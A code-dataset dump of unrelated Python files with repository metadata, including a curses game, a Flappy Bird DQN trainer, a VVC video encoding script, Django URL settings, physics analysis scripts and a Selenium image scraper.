if y_or_x == 'y':
if enemy.y > hero.y:
enemy.y -= 3
else:
enemy.y += 3
else:
y_or_x == 'x'
if enemy.x > hero.x:
enemy.x -= 5
else:
enemy.x += 5
fix_pos(enemy)
def draw_screen(hero, enemies, items, game_screen):
game_screen.clear()
for y in range(26):
for x in range(100):
if x % 5 == 0 :
game_screen.addstr(y, x, '|')
if y % 3 == 0:
game_screen.addstr(y, x, '-')
if dead == True:
hero.uni = '☠'
game_screen.addstr(1, 1, "AND YOU DEAD")
[game_screen.addstr(item.y + 1, item.x + 1, str(item)) for item in items]
[game_screen.addstr(enemy.y, enemy.x, str(enemy)) for enemy in enemies]
[game_screen.addstr(enemy.y + 1, enemy.x, enemy.mouth_string()) for enemy in enemies]
game_screen.addstr(hero.y, hero.x, str(hero))
game_screen.addstr(hero.y + 1, hero.x, hero.mouth_string())
game_screen.addstr(25, 1, f"Inventory: {hero.inv}")
game_screen.addstr(25, 35, f"Screen Size: {game_screen.getmaxyx()}")
game_screen.addstr(25, 70, f"Hero Postion: {hero.y, hero.x}")
if won:
game_screen.addstr(1, 1, "YOU WON!")
# game_screen.addstr(2, 1, f"{game_screen.getmaxyx()}")
game_screen = curses.initscr()
curses.curs_set(0)
print(game_screen.getmaxyx())
won = False
dead = False
game_screen.keypad(True)
game_screen.clear()
draw_screen(hero, enemies, items, game_screen)
game_screen.addstr(2, 41, "Arrow Keys To Move")
game_screen.addstr(5, 41, "WASD To Aim")
game_screen.addstr(8, 41, "SPACE To Shoot")
# game_screen.addstr(hero.y, hero.x, str(hero))
# game_screen.addstr(hero.y + 1, hero.x, hero.mouth_string())
# [game_screen.addstr(item.y, item.x, str(item)) for item in items]
# [game_screen.addstr(enemy.y, enemy.x, str(enemy)) for enemy in enemies]
# [game_screen.addstr(enemy.y + 1, enemy.x, enemy.mouth_string()) for enemy in enemies]
# game_screen.addstr(21, 5, f"Inventory: {hero.inv}")
# for enemy in enemies:
# game_screen.addstr(enemy.y, enemy.x, str(enemy))
while True:
in_key = game_screen.getkey()
if in_key == 'q':
curses.endwin()
break
for enemy in enemies:
if enemy.x == hero.x and enemy.y == hero.y:
dead = True
if dead == False and in_key in ['KEY_UP', 'KEY_DOWN', 'KEY_RIGHT', 'KEY_LEFT']:
if in_key == key_list[0]:
hero.y -= 3
elif in_key == key_list[1]:
hero.y += 3
elif in_key == key_list[2]:
hero.x += 5
elif in_key == key_list[3]:
hero.x -= 5
fix_pos(hero)
for item in items:
if item.y == hero.y and item.x == hero.x:
hero.inv.append(item)
items.remove(item)
enemy_move(hero, enemies)
if dead == False and in_key in ['w', 'a', 's', 'd']:
aim(hero, in_key)
aim_dir = in_key
draw_screen(hero, enemies, items, game_screen)
if dead == False and in_key == ' ':
shoot(hero, enemies, aim_dir, game_screen)
enemy_move(hero, enemies)
if enemies == []:
won = True
draw_screen(hero, enemies, items, game_screen)
# print(game_screen.getmaxyx()) | [
"pwj2012@gmail.com"
] | pwj2012@gmail.com |
2c1dcce271be95ff71696e0634eac1611b1af8d3 | 81acce1d49924d89e6ebf5a472ad5b1b80cc202c | /qcdScale/qcdFitter.py | 7650be090a5d03a503d1e3c513a0cb4b5ae83b62 | [] | no_license | truggles/Z_to_TauTau_13TeV | 36a85b024052fcfef3c9efd8aebc63dc85744f7b | 123fe0d25f8e926d8959f54cd4f64122394b60d5 | refs/heads/master | 2021-03-13T01:50:43.031581 | 2017-10-12T18:56:25 | 2017-10-12T18:56:25 | 37,312,811 | 0 | 0 | null | 2016-09-29T08:29:13 | 2015-06-12T09:08:22 | Python | UTF-8 | Python | false | false | 449 | py | import ROOT
from ROOT import gROOT
def qcdFit() :
f = ROOT.TFile('roots/OSvsSS.root','r')
h = f.Get('OSvsSS')
func = ROOT.TF2( 'func', '[0] + (x * [1]) +(y *[2])' )
f1 = gROOT.GetFunction('func' )
f1.SetParName( 0, 'Intercept' )
f1.SetParName( 1, 'x-slope' )
f1.SetParName( 2, 'y-slope' )
f1.SetParameter( 0, 99 )
f1.SetParameter( 1, 99 )
f1.SetParameter( 2, 99 )
h.Fit('func', 'R' )
qcdFit()
| [
"truggles@wisc.edu"
] | truggles@wisc.edu |
8e165645b9a092e4faa7392ab4052d978f7ea58e | 222d7bd1c7fba8d2cfe2754ae1b07e7219ff854e | /Run_VVC-bu.py | f3bfd8de137923efe4c4b3154638e4586b7ebb46 | [] | no_license | mkjubran/VVCS | 70981f1a64f380c2b3d04e138a46bf545d8b1bf7 | 79ffb3cbe25a48848eb2b4dbadc908f053c3f8f1 | refs/heads/master | 2020-12-22T09:48:42.629357 | 2020-07-14T07:24:23 | 2020-07-14T07:24:23 | 236,737,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,839 | py | #Frame1: Type POC QPoffset QPOffsetModelOff QPOffsetModelScale CbQPoffset CrQPoffset QPfactor tcOffsetDiv2 betaOffsetDiv2 temporal_id #ref_pics_active #ref_pics reference
#pictures predict deltaRPS #ref_idcs reference idcs print >> fid, 'Frame1: P 1 5 -6.5 0.2590 0 0 1.0 0 0 0 1 1 -1 0');
from __future__ import division
import numpy as np
import os, sys, subprocess, pdb
import argparse
import ConfigParser
import datetime, math, time
import ntpath
INF = 999
###--------------------------------------------------------------
## Parse configuration Parameters from the configuration file
def main(argv=None):
# Do argv default this way, as doing it in the functional
# declaration sets it at compile time.
if argv is None:
argv = sys.argv
# Parse any conf_file specification
# We make this parser with add_help=False so that
# it doesn't parse -h and print help.
conf_parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
# Turn off help, so we print all options in response to -h
add_help=False
)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args()
defaults = { "option":"default"}
if args.conf_file:
config = ConfigParser.SafeConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("Parametters")))
#print(dict(config.items("Parametters")))
# Parse rest of arguments
# Don't suppress add_help here so it will handle -h
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser]
)
parser.set_defaults(**defaults)
args = parser.parse_args(remaining_argv)
return(args)
###--------------------------------------------------------------
def call(cmd):
# proc = subprocess.Popen(["cat", "/etc/services"], stdout=subprocess.PIPE, shell=True)
#proc = subprocess.Popen(cmd, \
# stdout=subprocess.PIPE, shell=True)
#print(cmd)
subprocess.call(cmd,shell=True)
#proc = subprocess.Popen(cmd,stdout=subprocess.PIPE, shell=True)
#(out, err) = proc.communicate()
return #(out, err)
###--------------------------------------------------------------
def call_bg(cmd):
#proc = subprocess.Popen(cmd, shell=True)
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE, shell=True)
return proc
###--------------------------------------------------------------
def call_bg_file(cmd,fidProcess):
proc = subprocess.Popen(cmd,stdout=fidProcess, shell=True)
fidProcess.close
return proc
###--------------------------------------------------------------
def Encode_decode_video():
encoderlog=[]
decoderlog=[]
VMAFlog=[]
now_start=[]
now_end=[]
now_start.append(datetime.datetime.now())
print('Encoding {}'.format(now_start[0].strftime("%Y-%m-%d %H:%M:%S")))
InputYUV='{}.yuv'.format(vid[:-4])
fname = ntpath.basename(InputYUV)[:-4]
for cnt in range(len(rate)):
BitstreamFile='{}/VVCencoded_{}_{}.bin'.format(Path,fname,rate[cnt])
ReconYUV='{}/VVCrecon_{}_{}.yuv'.format(Path,fname,rate[cnt])
encoderlogfile='{}/VVClog_{}_{}.dat'.format(Path,fname,rate[cnt])
fid = open(encoderlogfile,'w')
osout = call_bg_file('./VVCOrig/bin/EncoderAppStatic -c ./VVCOrig/cfg/encoder_lowdelay_P_vtm.cfg -c ./VVCOrig/cfg/encoder_VVC_GOP.cfg --InputFile={} --SourceWidth={} --SourceHeight={} --SAO=0 --InitialQP={} --FrameRate={} --FramesToBeEncoded={} --MaxCUSize={} --MaxPartitionDepth={} --BitstreamFile="{}" --RateControl={} --TargetBitrate={} --ReconFile={}'.format(InputYUV,Width,Hight,QP,fps,NumFrames,MaxCUSize,MaxPartitionDepth,BitstreamFile,RateControl,rate[cnt],ReconYUV),fid)
encoderlog.append(osout)
for cnt in range(len(rate)):
encoderlog[cnt].wait()
### decoding ------------
for cnt in range(len(rate)):
OutputYUV='{}/VVCoutput_{}_{}.yuv'.format(Path,fname,rate[cnt])
#osout = call('rm -rf {}'.format(Path,OutputYUV))
BitstreamFile='{}/VVCencoded_{}_{}.bin'.format(Path,fname,rate[cnt])
decoderlogfile='{}/VVCdecoderlog_{}_{}.dat'.format(Path,fname,rate[cnt])
fid = open(decoderlogfile,'w')
osout = call_bg_file('./VVCOrig/bin/DecoderAppStatic -b {} -o {}'.format(BitstreamFile,OutputYUV),fid)
decoderlog.append(osout)
for cnt in range(len(rate)):
decoderlog[cnt].wait()
### VMAF --------
for cnt in range(len(rate)):
OutputYUV='{}/VVCoutput_{}_{}.yuv'.format(Path,fname,rate[cnt])
VMAFlogfile='{}/VVClog_{}_{}.dat'.format(Path,fname,rate[cnt])
fid = open(VMAFlogfile,'a')
osout = call_bg_file('../vmaf/run_vmaf yuv420p {} {} {} {}'.format(Width,Hight,InputYUV,OutputYUV),fid)
VMAFlog.append(osout)
for cnt in range(len(rate)):
VMAFlog[cnt].wait()
VMAFlogfile='{}/VVClog_{}_{}.dat'.format(Path,fname,rate[cnt])
### replace Frame to VMAF_Frame in the log file
call('./Replace_Frame_to_VMAF_Frame --fn {}'.format(VMAFlogfile))
return
##################################################################
## Main Body
if __name__ == "__main__":
args=main()
##Inputs
vid=args.vid;
fps=int(args.fps);
Width=int(args.w);
Hight=int(args.h);
QP=int(args.qp);
MaxCUSize=int(args.maxcusize);
MaxPartitionDepth=int(args.maxpartitiondepth);
RateControl=int(args.ratecontrol);
rate_str = args.rate.split(' ')
rate = [int(r) for r in rate_str]
NumFrames=int(args.numframes)
Path = args.resultspath
Encode_decode_video()
| [
"mjubran@birzeit.edu"
] | mjubran@birzeit.edu |
887a23cdc580ec87b2158ee45d31535b0c0dc08e | 65ed6010531735377d8c0b8a77d0d336842ebe3e | /atx/device/__init__.py | f02e38e70d7453565c1496ce76e0b8f43445816f | [
"BSD-3-Clause",
"MIT"
] | permissive | neteaseknight/AirtestX | 5084a9401777f765e11f70dd02bf3633f5cb66fd | c1fe6581f5f37088cbc486c9f128b6f26b0c7695 | refs/heads/master | 2021-01-17T21:42:27.346213 | 2016-04-03T12:44:10 | 2016-04-03T12:44:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,871 | py | # coding: utf-8
from __future__ import absolute_import
import collections
from atx import imutils
FindPoint = collections.namedtuple('FindPoint', ['pos', 'confidence', 'method', 'matched'])
Display = collections.namedtuple('Display', ['width', 'height'])
__boundstuple = collections.namedtuple('Bounds', ['left', 'top', 'right', 'bottom'])
class Bounds(__boundstuple):
def __init__(self, *args, **kwargs):
super(Bounds, self).__init__(*args, **kwargs)
self._area = None
def is_inside(self, x, y):
v = self
return x > v.left and x < v.right and y > v.top and y < v.bottom
@property
def area(self):
if not self._area:
v = self
self._area = (v.right-v.left) * (v.bottom-v.top)
return self._area
@property
def center(self):
v = self
return (v.left+v.right)/2, (v.top+v.bottom)/2
def __mul__(self, mul):
return Bounds(*(int(v*mul) for v in self))
class Pattern(object):
def __init__(self, image, offset=(0, 0), anchor=0, rsl=None, resolution=None):
"""
Args:
image: image filename or image URL
offset: offset of image center
anchor: not supported
resolution: image origin screen resolution
rsl: alias of resolution
"""
self._name = None
self._image = imutils.open(image)
self._offset = offset
self._resolution = rsl or resolution
if isinstance(image, basestring):
self._name = image
def __str__(self):
return 'Pattern(name: {}, offset: {})'.format(self._name, self.offset)
@property
def image(self):
return self._image
@property
def offset(self):
return self._offset
@property
def resolution(self):
return self._resolution | [
"codeskyblue@gmail.com"
] | codeskyblue@gmail.com |
dec4a2fb41492241dfdefc7038a33d1f48fa4b13 | 9fa08002daf2e991ff9dfe33ab47c4518976cc12 | /DeepLearing/DeepLearningFlappyBird-master/deep_q_network.py | abdb40aeef2860bb55123cb5bb6e8f77f8267cd3 | [
"MIT"
] | permissive | freeflyfish/code_file | 6e1264de2c13d700895bde31421ca791802f1ac6 | e80cc440f1c969af417bc5bad73c61b50dfa7590 | refs/heads/master | 2020-04-30T22:10:06.929633 | 2018-12-07T10:31:04 | 2018-12-07T10:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,232 | py |
from __future__ import print_function
import tensorflow as tf
import cv2
import sys
sys.path.append("game/")
import game.wrapped_flappy_bird as game
import random
import numpy as np
from collections import deque
GAME = 'bird' # the name of the game being played for log files
ACTIONS = 2 # number of valid actions
GAMMA = 0.99 # decay rate of past observations
OBSERVE = 100000. # timesteps to observe before training
EXPLORE = 2000000. # frames over which to anneal epsilon
FINAL_EPSILON = 0.0001 # final value of epsilon
INITIAL_EPSILON = 0.0001 # starting value of epsilon
REPLAY_MEMORY = 50000 # number of previous transitions to remember
BATCH = 32 # size of minibatch
FRAME_PER_ACTION = 1
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev = 0.01)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.01, shape = shape)
return tf.Variable(initial)
def conv2d(x, W, stride):
return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = "SAME")
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = "SAME")
def createNetwork():
# network weights
W_conv1 = weight_variable([8, 8, 4, 32])
b_conv1 = bias_variable([32])
W_conv2 = weight_variable([4, 4, 32, 64])
b_conv2 = bias_variable([64])
W_conv3 = weight_variable([3, 3, 64, 64])
b_conv3 = bias_variable([64])
W_fc1 = weight_variable([1600, 512])
b_fc1 = bias_variable([512])
W_fc2 = weight_variable([512, ACTIONS])
b_fc2 = bias_variable([ACTIONS])
# input layer
s = tf.placeholder("float", [None, 80, 80, 4])
# hidden layers
h_conv1 = tf.nn.relu(conv2d(s, W_conv1, 4) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2, 2) + b_conv2)
#h_pool2 = max_pool_2x2(h_conv2)
h_conv3 = tf.nn.relu(conv2d(h_conv2, W_conv3, 1) + b_conv3)
#h_pool3 = max_pool_2x2(h_conv3)
#h_pool3_flat = tf.reshape(h_pool3, [-1, 256])
h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])
h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)
# readout layer
readout = tf.matmul(h_fc1, W_fc2) + b_fc2
return s, readout, h_fc1
def trainNetwork(s, readout, h_fc1, sess):
# define the cost function
a = tf.placeholder("float", [None, ACTIONS])
y = tf.placeholder("float", [None])
readout_action = tf.reduce_sum(tf.multiply(readout, a), reduction_indices=1)
cost = tf.reduce_mean(tf.square(y - readout_action))
train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)
# open up a game state to communicate with emulator
game_state = game.GameState()
# store the previous observations in replay memory
D = deque()
# printing
a_file = open("logs_" + GAME + "/readout.txt", 'w')
h_file = open("logs_" + GAME + "/hidden.txt", 'w')
# get the first state by doing nothing and preprocess the image to 80x80x4
do_nothing = np.zeros(ACTIONS)
do_nothing[0] = 1
x_t, r_0, terminal = game_state.frame_step(do_nothing)
x_t = cv2.cvtColor(cv2.resize(x_t, (80, 80)), cv2.COLOR_BGR2GRAY)
ret, x_t = cv2.threshold(x_t,1,255,cv2.THRESH_BINARY)
s_t = np.stack((x_t, x_t, x_t, x_t), axis=2)
# saving and loading networks
saver = tf.train.Saver()
sess.run(tf.initialize_all_variables())
checkpoint = tf.train.get_checkpoint_state("saved_networks")
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("Successfully loaded:", checkpoint.model_checkpoint_path)
else:
print("Could not find old network weights")
# start training
epsilon = INITIAL_EPSILON
t = 0
while "flappy bird" != "angry bird":
# choose an action epsilon greedily
readout_t = readout.eval(feed_dict={s : [s_t]})[0]
a_t = np.zeros([ACTIONS])
action_index = 0
if t % FRAME_PER_ACTION == 0:
if random.random() <= epsilon:
print("----------Random Action----------")
action_index = random.randrange(ACTIONS)
a_t[random.randrange(ACTIONS)] = 1
else:
action_index = np.argmax(readout_t)
a_t[action_index] = 1
else:
a_t[0] = 1 # do nothing
# scale down epsilon
if epsilon > FINAL_EPSILON and t > OBSERVE:
epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE
# run the selected action and observe next state and reward
x_t1_colored, r_t, terminal = game_state.frame_step(a_t)
x_t1 = cv2.cvtColor(cv2.resize(x_t1_colored, (80, 80)), cv2.COLOR_BGR2GRAY)
ret, x_t1 = cv2.threshold(x_t1, 1, 255, cv2.THRESH_BINARY)
x_t1 = np.reshape(x_t1, (80, 80, 1))
#s_t1 = np.append(x_t1, s_t[:,:,1:], axis = 2)
s_t1 = np.append(x_t1, s_t[:, :, :3], axis=2)
# store the transition in D
D.append((s_t, a_t, r_t, s_t1, terminal))
if len(D) > REPLAY_MEMORY:
D.popleft()
# only train if done observing
if t > OBSERVE:
# sample a minibatch to train on
minibatch = random.sample(D, BATCH)
# get the batch variables
s_j_batch = [d[0] for d in minibatch]
a_batch = [d[1] for d in minibatch]
r_batch = [d[2] for d in minibatch]
s_j1_batch = [d[3] for d in minibatch]
y_batch = []
readout_j1_batch = readout.eval(feed_dict = {s : s_j1_batch})
for i in range(0, len(minibatch)):
terminal = minibatch[i][4]
# if terminal, only equals reward
if terminal:
y_batch.append(r_batch[i])
else:
y_batch.append(r_batch[i] + GAMMA * np.max(readout_j1_batch[i]))
# perform gradient step
train_step.run(feed_dict = {
y : y_batch,
a : a_batch,
s : s_j_batch}
)
# update the old values
s_t = s_t1
t += 1
# save progress every 10000 iterations
if t % 10000 == 0:
saver.save(sess, 'saved_networks/' + GAME + '-dqn', global_step = t)
# print info
state = ""
if t <= OBSERVE:
state = "observe"
elif t > OBSERVE and t <= OBSERVE + EXPLORE:
state = "explore"
else:
state = "train"
print("TIMESTEP", t, "/ STATE", state, \
"/ EPSILON", epsilon, "/ ACTION", action_index, "/ REWARD", r_t, \
"/ Q_MAX %e" % np.max(readout_t))
# write info to files
'''
if t % 10000 <= 100:
a_file.write(",".join([str(x) for x in readout_t]) + '\n')
h_file.write(",".join([str(x) for x in h_fc1.eval(feed_dict={s:[s_t]})[0]]) + '\n')
cv2.imwrite("logs_tetris/frame" + str(t) + ".png", x_t1)
'''
def playGame():
sess = tf.InteractiveSession()
s, readout, h_fc1 = createNetwork()
trainNetwork(s, readout, h_fc1, sess)
def main():
playGame()
if __name__ == "__main__":
main()
| [
"807745654@qq.com"
] | 807745654@qq.com |
25c239b31c0a578419e6f525d348d98c0f40112a | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-MetalPerformanceShaders/PyObjCTest/test_mpsrayintersector_mpspolygonaccelerationstructure.py | 1a5da10d9a4ea08bb220c5af477a364059d79eaa | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 490 | py | from PyObjCTools.TestSupport import TestCase
import MetalPerformanceShaders
MPSAccelerationStructureCompletionHandler = b"v@"
class TestMPSRayIntersector_MPSPolygonAccelerationStructure(TestCase):
def test_enum_types(self):
self.assertIsEnumType(MetalPerformanceShaders.MPSPolygonType)
def test_constants(self):
self.assertEqual(MetalPerformanceShaders.MPSPolygonTypeTriangle, 0)
self.assertEqual(MetalPerformanceShaders.MPSPolygonTypeQuadrilateral, 1)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
d26f9799eb67232c4f9c0d0617aaa9b2f1ec1988 | 61673ab9a42f7151de7337608c442fa6247f13bb | /__scraping__/gall.dcinside.com/main.py | 490c073a6a1c9d7e5de77e2bc435f07699d416ff | [
"MIT"
] | permissive | furas/python-examples | 22d101670ecd667a29376d7c7d7d86f8ec71f6cf | 95cb53b664f312e0830f010c0c96be94d4a4db90 | refs/heads/master | 2022-08-23T23:55:08.313936 | 2022-08-01T14:48:33 | 2022-08-01T14:48:33 | 45,575,296 | 176 | 91 | MIT | 2021-02-17T23:33:37 | 2015-11-04T23:54:32 | Python | UTF-8 | Python | false | false | 774 | py | #!/usr/bin/env python3
# date: 2020.01.01
# https://stackoverflow.com/questions/59551193/i-want-to-download-images-from-python-what-should-i-do/
from selenium import webdriver
import requests
#path = r"C:\Users\qpslt\Desktop\py\chromedriver_win32\chromedriver.exe"
#driver = webdriver.Chrome(path)
driver = webdriver.Firefox()
url = "https://gall.dcinside.com/board/view/?id=baseball_new8&no=10131338&exception_mode=recommend&page=1"
driver.get(url)
images = driver.find_elements_by_xpath('//div[@class="writing_view_box"]//img')
for i, img in enumerate(images, 1):
img_url = img.get_attribute('src')
print(i, img_url)
r = requests.get(img_url, headers={'Referer': url})
with open("c:/test/{}.jpg".format(i), 'wb') as f:
f.write(r.content)
| [
"furas@tlen.pl"
] | furas@tlen.pl |
0c44c18c0c305096c4cde6e736d92a55731f5691 | 7048901d6ad4cd58150deec2f7095c4bc20e28bc | /coupons/serializers.py | 8c0a733f4fda39147966e3d16888dab2aad72790 | [] | no_license | reloadercf/Tienda_Backend | f658bc3b01cf7e8d7d86c4964a7808f04f866e66 | ef602107861096c3f2bb8f31eab12db44be4186d | refs/heads/master | 2022-07-29T03:49:40.413308 | 2019-10-21T16:47:40 | 2019-10-21T16:47:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from rest_framework import serializers
from .models import Coupon
class CouponSerializer(serializers.ModelSerializer):
class Meta:
model = Coupon
fields = '__all__' | [
"contacto@fixter.org"
] | contacto@fixter.org |
266d40130e6ece916b7a7b8d7242e4cccea1a212 | 868c604cdc34e04bba44834e8544036437a7eb9b | /chapter_1_building_abstractions_with_functions/example_1.py | f7311525c376f664a8d9930ffd5961f8ab97a62a | [] | no_license | cshintov/sicp | bc0c1ae5c3f2b9a068e446030fcde59d73209b7c | 46b36254d05171704ddcf45666d006e734a7a196 | refs/heads/master | 2021-04-23T03:14:32.416422 | 2020-03-24T13:24:12 | 2020-03-24T13:24:12 | 249,893,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from urllib import urlopen
shakespeare_poem = 'http://inst.eecs.berkeley.edu/~cs61a/fa11/shakespeare.txt'
poem = urlopen(shakespeare_poem)
print poem
| [
"cshintov@gmail.com"
] | cshintov@gmail.com |
c5f90bbaa9e2eaf84c3dc0035e740cbcbf93576d | d286518da2d7b74d63162cac3befe838f74ac93a | /backend/winter_firefly_27005/urls.py | 7305cf2e7f3fdf9cae158bb72166dce189017d05 | [] | no_license | crowdbotics-apps/winter-firefly-27005 | 7a1b28ec1e1bfa57800c0db25256929925935f1a | 96777599d723241987fd750bcaa72fe040deb738 | refs/heads/master | 2023-04-20T15:57:28.132529 | 2021-05-20T21:00:22 | 2021-05-20T21:00:22 | 369,336,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,247 | py | """winter_firefly_27005 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "Winter Firefly"
admin.site.site_title = "Winter Firefly Admin Portal"
admin.site.index_title = "Winter Firefly Admin"
# swagger
api_info = openapi.Info(
title="Winter Firefly API",
default_version="v1",
description="API documentation for Winter Firefly App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
urlpatterns += [path("", TemplateView.as_view(template_name='index.html'))]
urlpatterns += [re_path(r"^(?:.*)/?$",
TemplateView.as_view(template_name='index.html'))]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
6cdd9ef513534aeb4a9400bcad53eefa19477095 | 6d97e875fb6a3dea9780d918efe33dfd59ac137d | /scripts/calc_rec_probs.py | 2bc4c7f5437257ad4b4b9c2891975142f86a63be | [] | no_license | acarvalh/tth-htt | 0a1350efcf76f425057c809f74d92ae3d719d008 | c6bb3f2bfb6620c858d29c800be1ae1e2246904a | refs/heads/master | 2021-06-20T05:29:35.657498 | 2018-06-02T01:34:37 | 2018-06-02T01:34:37 | 104,874,635 | 0 | 0 | null | 2017-09-26T11:10:10 | 2017-09-26T11:10:10 | null | UTF-8 | Python | false | false | 2,950 | py | from ROOT import TFile
import ROOT
categories = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
def calc_rec_probs(infile, processes):
f = TFile(infile)
for p in processes:
print p
for cat in categories:
histo_OS = f.Get("OS/%s/%s" % (cat, "mass_ll"))
histo_SS = f.Get("SS/%s/%s" % (cat, "mass_ll"))
print "SS/%s/%s" % (cat, "mass_ll")
#print cat, "Entries: %d SS, %d OS" % (histo_SS.GetEntries(), histo_OS.GetEntries())
#for bin_pt in range(1, histo_OS.GetNbinsX()+1):
#for bin_eta in range(1, histo_OS.GetNbinsY()+1):
os_count = histo_OS.Integral()
ss_count = histo_SS.Integral()
if ss_count + os_count > 0:
ratio = 100. * ss_count / (ss_count + os_count)
print "Category: %s:\t Ratio = %f" % (cat, ratio)
else: print "Category: %s:\t Ratio = NA" % cat
#print "Integral OS:", histo_OS.Integral(), histo_OS.Integral(1,histo_OS.GetNbinsX()-1)
#print "Integral SS:", histo_SS.Integral(), histo_SS.Integral(1,histo_SS.GetNbinsX()-1)
def calc_probs_21(infile):
f = TFile(infile)
cats = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
for cat in cats:
histo_OS = f.Get("gen/OS/%s/mass_ll" % cat)
histo_SS = f.Get("gen/SS/%s/mass_ll" % cat)
os_count = histo_OS.Integral()
ss_count = histo_SS.Integral()
if os_count > 0:ratio = 100. * ss_count / (ss_count + os_count)
else: ratio = 100.
print "Category %s:\t ratio = %f" % (cat, ratio)
def print_probs_21(infile):
f = TFile(infile)
cats = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
i = 0
os_err = ROOT.Double()
ss_err = ROOT.Double()
for cat in cats:
histo_OS = f.Get("gen/OS/%s/mass_ll" % cat)
histo_SS = f.Get("gen/SS/%s/mass_ll" % cat)
os_count = histo_OS.IntegralAndError(0, histo_OS.GetNbinsX()+2, os_err)
ss_count = histo_SS.IntegralAndError(0, histo_SS.GetNbinsX()+2, ss_err)
if os_count > 0:
ratio = ss_count / (ss_count + os_count)
err = (ss_count + ss_err) / (ss_count + ss_err + os_count - os_err) - ratio
else: ratio = 1.
print "%d, %f, %f, %f" % (i, ratio, err, err)
#print "ERR: ", ss_count, ss_err, os_count, os_err
i+=1
if __name__ == "__main__":
procs = ["DY"]
infile = "/hdfs/local/ttH_2tau/andres/ttHAnalysis/2016/histosCF_summer2/histograms/charge_flip/histograms_harvested_stage2_charge_flip_Tight.root"
#calc_rec_probs(infile, procs)
print "_" * 80
calc_probs_21(infile)
print_probs_21(infile)
| [
"andres.tiko@cern.ch"
] | andres.tiko@cern.ch |
1ceef34be4f65f2c9baae4ffe8778cb490a17660 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210129091734.py | 095946f3367c54f7ca3a4f7faf804a6b08068a18 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,076 | py | # 东方财富网 首发申报
from datetime import datetime,timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
